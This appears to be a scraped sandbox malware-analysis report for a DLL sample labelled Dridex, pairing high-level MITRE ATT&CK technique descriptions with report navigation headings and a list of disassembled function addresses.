Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report u3A1eWFqLE.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5340 Parent PID: 5580

Function 00EC2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 733307CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 73321494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 7333218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 73332790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 73333060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 025D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 73335DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 73331140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 73335720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 73335AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 73335B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 73335B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 73335B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 73335B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 73335B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 73335D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 733355B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 733310CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 73333564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 73329144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 7332A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 733392DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 733284E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 733314D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 73326DC8, Relevance: .0, Instructions: 36
COMMON

Function 7332BC00, Relevance: .0, Instructions: 16
COMMON

Function 023D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON